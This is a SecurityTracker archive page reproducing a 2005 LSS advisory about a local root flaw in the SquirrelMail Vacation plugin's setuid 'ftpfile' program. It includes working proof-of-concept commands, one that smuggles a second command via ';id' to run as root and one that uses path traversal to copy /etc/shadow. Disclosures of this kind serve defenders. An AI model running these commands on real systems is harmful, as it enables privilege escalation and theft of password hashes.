Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (E-mail Server)  >   Squirrelmail Vacation Plugin Vendors:   SquirrelMail Development Team
Squirrelmail Vacation Plugin Lets Local Users Execute Arbitrary Commands With Root Privileges
SecurityTracker Alert ID:  1012866
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 13 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Root access via local system

Version(s): 0.15
Description:   A vulnerability was reported in Squirrelmail in the vacation plugin. A local user can view arbitrary files and execute arbitrary commands.

LSS reported that a local user can invoke the 'ftpfile' program to execute arbitrary commands with root privileges. The program, which is configured with set user id (setuid) root user privileges, does not properly validate user-supplied command line arguments before passing them to an execve() call. A demonstration exploit is provided:

ftpfile 0 root 0 get 0 "LSS-Security;id"

A local user can also invoke ftpfile to copy arbitrary files with root privileges to the user's home directory. A demonstratoin exploit is provided:

ftpfile localhost root root get ../../../../etc/shadow ./shadow

Leon Juranic is credited with discovering this flaw.

The vendor has been notified without response.

The original advisory is available at:

Impact:   A local user can execute arbitrary commands with root privileges.

A local user can copy arbitrary files with root privileges.

Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents

Subject:  Squirrelmail vacation v0.15 local root exploit

			LSS Security Advisory #LSS-2005-01-03


Title			:  Squirrelmail vacation v0.15 local root exploit 
Advisory ID		:  LSS-2005-01-03
Date			:  10.01.2005. 
Advisory URL:		:
Impact			:  Privilege escalation and arbitrary file read
Risk level		:  High 
Vulnerability type	:  Local
Vendors contacted	:  No response from vendor


===[ Overview 

Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of 
the receiver's absence. Vacation plugin specifically uses the Vacation program.
Plugin can be downloaded from:

===[ Vulnerability

Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
The program is used to access local files in user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile. 
Command line arguments are passed to execve() function without checking
for meta-characters, therefore making possible execution of commands as root.

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$  ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ 

It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow[ljuranic@laptop ljuranic]$ head ./shadow
[ljuranic@laptop ljuranic]$ 

===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.

===[ Fix

Not available yet.

===[ PoC Exploit

===[ Credits

Credits for this vulnerability goes to Leon Juranic. 

===[ LSS Security Contact
 LSS Security Team, <eXposed by LSS>
 WWW    :
 E-mail :
 Tel	: +385 1 6129 775


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, LLC